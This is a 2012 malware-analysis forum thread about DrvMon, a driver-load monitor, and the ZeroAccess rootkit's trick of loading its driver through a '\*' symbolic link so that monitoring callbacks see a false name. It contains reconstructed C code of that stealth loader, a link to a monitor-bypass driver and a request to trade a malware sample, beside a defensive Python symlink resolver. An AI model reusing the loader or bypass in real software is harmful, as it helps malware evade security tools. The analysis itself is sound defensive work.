A forum for reverse engineering, OS internals and malware analysis 

Forum for announcements and questions about tools and software.
 #12277  by kmd
 Fri Mar 23, 2012 6:31 am
When will the next version be published? Soon a year will have passed since this:
This kind of spoofing is not handled by the currently available 1.2 version, nor is load-from-header.
All of these are resolved in v2.0, which has been ready for about a month.
 #12282  by EP_X0FF
 Fri Mar 23, 2012 8:25 am
kmd wrote: When will the next version be published? Soon a year will have passed since this:
This kind of spoofing is not handled by the currently available 1.2 version, nor is load-from-header.
All of these are resolved in v2.0, which has been ready for about a month.
We decided not to release the newer version (2.x) to the public. Overall it's now a completely different application than the one attached here.
 #12384  by Brock
 Thu Mar 29, 2012 5:44 am
Haven't followed this thread in forever but now have seen talk of this ZeroAccess Trojan/RK "spoofing" the ImageInfo->FileName UNICODE_STRING? I don't have a sample of this, but wouldn't this driver logically still need to be loaded prior to DrvMon running and other such tools? Anyhow, instead of using ImageInfo->FileName directly one could, if the ExtendedInfoPresent flag in the passed ImageInfo is set, use the IMAGE_INFO_EX structure instead, which provides a FILE_OBJECT pointer for the driver; ObQueryNameString on that file object pointer and the driver name should be revealed? Of course, this could be "spoofed" too, but perhaps with more work? My suggested bypass doesn't need "kernel mode" help; it is a PE optional header structure member that changes and complicates things, so I am curious to see what ZA is doing. Reverser comments welcomed ;)

P.S. My bypass driver link has been updated because the old one was a dead download link; thanks to xqrzd for pointing this out.
http://uploading.com/files/6cd371e8/Bypass.sys
 #12418  by EP_X0FF
 Sat Mar 31, 2012 3:01 am
Brock wrote: Haven't followed this thread in forever but now have seen talk of this ZeroAccess Trojan/RK "spoofing" the ImageInfo->FileName UNICODE_STRING? I don't have a sample of this, but wouldn't this driver logically still need to be loaded prior to DrvMon running and other such tools? Anyhow, instead of using ImageInfo->FileName directly one could, if the ExtendedInfoPresent flag in the passed ImageInfo is set, use the IMAGE_INFO_EX structure instead, which provides a FILE_OBJECT pointer for the driver; ObQueryNameString on that file object pointer and the driver name should be revealed? Of course, this could be "spoofed" too, but perhaps with more work? My suggested bypass doesn't need "kernel mode" help; it is a PE optional header structure member that changes and complicates things, so I am curious to see what ZA is doing. Reverser comments welcomed ;)
Code:
BOOL LoadDriverZAccess(
	PWSTR DriverName,
	PWSTR RegistryPath,
	PBYTE BinaryBuffer,
	ULONG BinaryBufferSize,
	PNTSTATUS pStatus
	)
{
	// Reconstructed pseudo-code of the 2011 ZeroAccess driver loader. tmpBuffer (a WCHAR[BUFFER_SIZE]
	// scratch buffer), NativeWriteBufferToFile and NativeLoadDriver are the poster's own helpers,
	// defined elsewhere in his source.
	BOOL result = FALSE;
	NTSTATUS ns = STATUS_UNSUCCESSFUL;
	UNICODE_STRING drvname;
	UNICODE_STRING str1;
	OBJECT_ATTRIBUTES attr;
	HANDLE Link;

	__try {

		// Build "\??\<system directory>\drivers\<DriverName>" and write the driver image there.
		RtlSecureZeroMemory(tmpBuffer, BUFFER_SIZE);
		wcscpy(tmpBuffer, L"\\??\\");
		if (GetSystemDirectory(&tmpBuffer[4], MAX_PATH)) {

			wcscat(tmpBuffer, L"\\drivers\\");
			wcscat(tmpBuffer, DriverName);

			ns = (NTSTATUS)NativeWriteBufferToFile(
				&tmpBuffer[4],
				BinaryBuffer,
				BinaryBufferSize,
				FALSE,
				FALSE
				);

			if (NT_SUCCESS(ns)) {

				// Create the object manager symbolic link "\*" -> "\??\...\drivers\<DriverName>" and
				// load the driver through the link, so a load-image callback sees "\*" as the file name
				// instead of the real path.
				RtlInitUnicodeString(&str1, L"\\*");
				RtlInitUnicodeString(&drvname, tmpBuffer);
				InitializeObjectAttributes(&attr, &str1, OBJ_CASE_INSENSITIVE, 0, NULL);
				ns = NtCreateSymbolicLinkObject(&Link, SYMBOLIC_LINK_ALL_ACCESS, &attr, &drvname);
				if (NT_SUCCESS(ns)) {

					ns = NativeLoadDriver(TEXT("\\*"), RegistryPath, NULL);
					result = NT_SUCCESS(ns);

					// The link was not created OBJ_PERMANENT, so closing the only handle removes it again.
					NtClose(Link);
				}
				// Try to remove the on-disk copy of the driver right after loading it.
				RtlInitUnicodeString(&drvname, tmpBuffer);
				InitializeObjectAttributes(&attr, &drvname, OBJ_CASE_INSENSITIVE, 0, NULL);
				NtDeleteFile(&attr);
			}
		}

		if (pStatus)
			*pStatus = ns;

	} __except (EXCEPTION_EXECUTE_HANDLER) {

		result = FALSE;

	}
	return result;
}
I don't know how the latest ZA does this, but the ZA from 2011 worked that way. Expand and decode the symlink (there could be multiple: A->B->...->Z) and that is all.

IMAGE_INFO_EX is unavailable prior to Vista.
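As an added example (not DrvMon's or the poster's code), here is a user-mode Python model of the check described above: follow the chain of object manager symbolic links behind the reported driver name until only a device path remains, with a hop budget and loop detection so a hostile chain cannot stall the monitor. The link table, the drive-letter mapping and the evil.sys name are constructed for the example; in a real driver each hop would be a ZwOpenSymbolicLinkObject/ZwQuerySymbolicLinkObject pair.

```python
# Constructed model of the NT object manager's symbolic-link namespace.
# Names and the evil.sys target are made up for the example; in a real
# driver each hop is ZwOpenSymbolicLinkObject + ZwQuerySymbolicLinkObject.
SYMLINKS = {
    r"\*": r"\??\C:\Windows\system32\drivers\evil.sys",  # link the loader above creates
    r"\??\C:": r"\Device\HarddiskVolume2",               # ordinary drive-letter link
    r"\??\A": r"\??\B",                                  # A -> B -> A loop, for testing
    r"\??\B": r"\??\A",
}
MAX_HOPS = 32  # reparse budget; the object manager itself bounds this too


def longest_link_prefix(path, symlinks):
    """Longest link name equal to path or a whole-component prefix of it, else None."""
    # Object names are case-insensitive and a link only matches up to a path
    # separator: r"\??\C:" matches r"\??\C:\x.sys" but not r"\??\C:x.sys".
    best = None
    lowered = path.lower()
    for link in symlinks:
        candidate = link.lower()
        if lowered == candidate or lowered.startswith(candidate + "\\"):
            if best is None or len(link) > len(best):
                best = link
    return best


def resolve_symlink_chain(path, symlinks=SYMLINKS, max_hops=MAX_HOPS):
    """Expand symbolic links in path until only a device path remains.

    Returns (resolved_path, hops_taken). Raises ValueError on a loop or an
    overlong chain rather than trusting whatever name the caller reported.
    """
    hops = []
    for _ in range(max_hops):
        link = longest_link_prefix(path, symlinks)
        if link is None:
            return path, hops
        if link in hops:
            raise ValueError("symbolic link loop: " + " -> ".join(hops + [link]))
        hops.append(link)
        path = symlinks[link] + path[len(link):]
    raise ValueError("symbolic link chain longer than %d hops" % max_hops)


if __name__ == "__main__":
    # What a load-image callback is told versus where the image really lives.
    real, chain = resolve_symlink_chain(r"\*")
    print("reported \\* is really", real, "via", chain)
```

The same walk applies to an ordinary `\??\C:\...` name, which only needs the drive-letter hop, and to a `\SystemRoot\...` name, which in this table needs none.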
 #12420  by Brock
 Sat Mar 31, 2012 3:44 am
@EP_X0FF,
IMAGE_INFO_EX is unavailable prior to Vista.
Yes, I am aware of this as I still run XP 32-bit natively, but even now Vista is old too :lol:

Thanks for the pseudo-code for loading its driver, interesting indeed. Would it be impolite of me to request a sample of ZA (doesn't matter which variant) if you have one? If it's too sensitive, perhaps via private message?
 #13823  by m5home
 Fri Jun 08, 2012 10:54 pm
Does it support WIN64 now?
 #13827  by EP_X0FF
 Sat Jun 09, 2012 3:50 am
m5home wrote: Does it support WIN64 now?
Yes, Win8 too, since about a year ago.